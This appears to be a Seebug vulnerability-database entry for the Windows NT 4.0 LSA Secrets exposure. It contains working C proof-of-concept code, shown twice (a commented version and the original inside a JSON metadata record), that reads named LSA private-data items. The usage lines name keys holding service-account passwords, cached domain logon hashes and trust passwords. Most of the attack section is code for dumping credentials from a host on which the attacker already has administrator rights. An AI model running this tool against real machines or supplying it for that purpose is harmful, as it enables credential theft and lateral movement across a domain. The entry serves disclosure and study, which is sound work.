Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 LSA Secrets Vulnerability
2014-07-01T00:00:00
ID SSV:73138 Type seebug Reporter Root Modified 2014-07-01T00:00:00
Description
No description provided by source.
source: http://www.securityfocus.com/bid/231/info
The HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets\ key contains obfuscated data for various system services/resources. Clear-text usernames and passwords for services running under the context of a user account, password hashes and usernames for the last ten users to log on to the domain from the local host, domain trust passwords, passwords for web and ftp services, and dial-up networking usernames, passwords and phone numbers can be obtained and "decrypted" from the Policy\Secrets key. Reading the key requires administrative privileges on the host, so the exposure is that administrative access to one machine also discloses credentials that are valid beyond that machine (service accounts, domain logons, trust passwords).
Must be run with administrative privileges.
Run as: prog _sc_schedule [machine], prog nl$1, prog w3_root_data,
or with the name of any other registry key under HKLM\SECURITY\Policy\Secrets.
<---begin--->
#include <windows.h>
#include <stdio.h>
#include "ntsecapi.h"
/*
 * AST(x): evaluate x once; when it is false, print the source line number
 * of the failing check to stdout and terminate with exit status 1.
 * Wrapped in do/while(0) so the macro behaves as a single statement.
 */
#define AST(x) do { if (!(x)) { printf("Failed line %d\n", __LINE__); exit(1); } } while (0)
/*
 * main calls write(1, buffer, length). No header that declares write() is
 * included in this file, so it is declared here without a parameter list.
 */
void write();
/*
 * Describe a NUL-terminated wide string as an LSA_UNICODE_STRING.
 *
 * x is not copied: Buffer points at the caller's storage. Length is the
 * string's size in bytes without the terminator, MaximumLength the size
 * including it.
 *
 * The result lives in a single function-static structure, so every call
 * overwrites what the previous call returned; use the pointer before
 * calling str() again.
 */
PLSA_UNICODE_STRING
str(LPWSTR x)
{
    static LSA_UNICODE_STRING s;
    size_t chars = wcslen(x);

    s.MaximumLength = (chars + 1) * sizeof(WCHAR);
    s.Length = chars * sizeof(WCHAR);
    s.Buffer = x;
    return &s;
}
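/*
 * Entry point: opens an LSA policy handle, retrieves one private-data item
 * by name and writes its raw bytes to file descriptor 1.
 *
 * argv[1]  name of the private-data item to retrieve (required)
 * argv[2]  optional system name handed to LsaOpenPolicy; only used when
 *          exactly two arguments are given, otherwise the empty string
 *          is passed
 *
 * Exits with 0 on success, 1 on a usage error or when an LSA call fails.
 */
int _cdecl
main(int argc, char *argv[])
{
    LSA_HANDLE pol;
    PLSA_UNICODE_STRING foo;
    LSA_OBJECT_ATTRIBUTES attrs;
    WCHAR keyname[256]=L"";
    WCHAR host[256]=L"";
    const int cap = (int)(sizeof keyname / sizeof keyname[0]);

    /* argv[1] was previously read without checking that it exists. */
    if (argc < 2) {
        printf("usage: prog keyname [machine]\n");
        exit(1);
    }

    /*
     * wsprintfW is not told the destination size, so an over-long argument
     * would write past the 256-element stack buffers. Reject it up front.
     */
    if (lstrlenA(argv[1]) >= cap) {
        printf("keyname too long (max %d characters)\n", cap - 1);
        exit(1);
    }
    wsprintfW(keyname, L"%hS", argv[1]);

    if (argc == 3) {
        if (lstrlenA(argv[2]) >= cap) {
            printf("machine name too long (max %d characters)\n", cap - 1);
            exit(1);
        }
        wsprintfW(host, L"%hS", argv[2]);
    }

    memset(&attrs, 0, sizeof(attrs));

    /* Both LSA calls return 0 on success, hence the negation inside AST. */
    AST(!LsaOpenPolicy(str(host), &attrs, 0, &pol));
    AST(!LsaRetrievePrivateData(pol, str(keyname), &foo));

    /* Length is a byte count; the data is emitted unmodified. */
    write(1, foo->Buffer, foo->Length);

    /* The buffer returned by LsaRetrievePrivateData is owned by the caller. */
    LsaFreeMemory(foo);
    LsaClose(pol);
    exit(0);
}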
<---end--->
{"href": "https://www.seebug.org/vuldb/ssvid-73138", "status": "poc", "history": [], "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 LSA Secrets Vulnerability", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-73138", "cvelist": [], "description": "No description provided by source.", "viewCount": 1, "published": "2014-07-01T00:00:00", "sourceData": "\n source: http://www.securityfocus.com/bid/231/info\r\n\r\n\r\nThe HKeyLocalMachine\\SECURITY\\Policy\\Secrets\\ key contains obfuscated data for various system services/resources. Clear-text usernames and passwords for services running under the context of a user account, password hashes and usernames for the last ten users to log on to the domain from the local host, domain trust passwords, passwords for web and ftp services, and dial-up networking usernames, passwords and phone numbers can be obtained and "decrypted" from the Policy\\Secrets key. 
\r\n\r\nMust be run with administrative privileges\r\n\r\nrun as: prog _sc_schedule [machine], prog nl$1, prog w3_root_data\r\nor any other registry key under NTLM\\security\\policy\\secrets.\r\n\r\n<---begin--->\r\n#include <windows.h>\r\n#include <stdio.h>\r\n\r\n#include "ntsecapi.h"\r\n#define AST(x) if (!(x)) {printf("Failed line %d\\n", __LINE__);exit(1);} else\r\nvoid write();\r\n\r\nPLSA_UNICODE_STRING\r\nstr(LPWSTR x)\r\n{\r\nstatic LSA_UNICODE_STRING s;\r\n\r\ns.Buffer=x;\r\ns.Length=wcslen(x)*sizeof(WCHAR);\r\ns.MaximumLength = (wcslen(x)+1)*2;\r\nreturn &s;\r\n}\r\n\r\nint _cdecl\r\nmain(int argc, char *argv[])\r\n{\r\nLSA_HANDLE pol;\r\nPLSA_UNICODE_STRING foo;\r\nLSA_OBJECT_ATTRIBUTES attrs;\r\nWCHAR keyname[256]=L"";\r\nWCHAR host[256]=L"";\r\n\r\nwsprintfW(keyname, L"%hS", argv[1]);\r\nif(argc == 3) wsprintfW(host, L"%hS", argv[2]);\r\nmemset(&attrs, 0, sizeof(attrs));\r\nAST(!LsaOpenPolicy(str(host), &attrs, 0, &pol));\r\nAST(!LsaRetrievePrivateData(pol, str(keyname), &foo));\r\nwrite(1, foo->Buffer, foo->Length);\r\nLsaClose(pol);\r\nexit(0);\r\n}\r\n<---end---> \n ", "id": "SSV:73138", "enchantments_done": [], "_object_type": "robots.models.seebug.SeebugBulletin", "type": "seebug", "lastseen": "2017-11-19T16:14:55", "reporter": "Root", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments": {"score": {"value": 7.2, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2017-11-19T16:14:55"}, "vulnersScore": 7.2}, "objectVersion": "1.4", "references": []}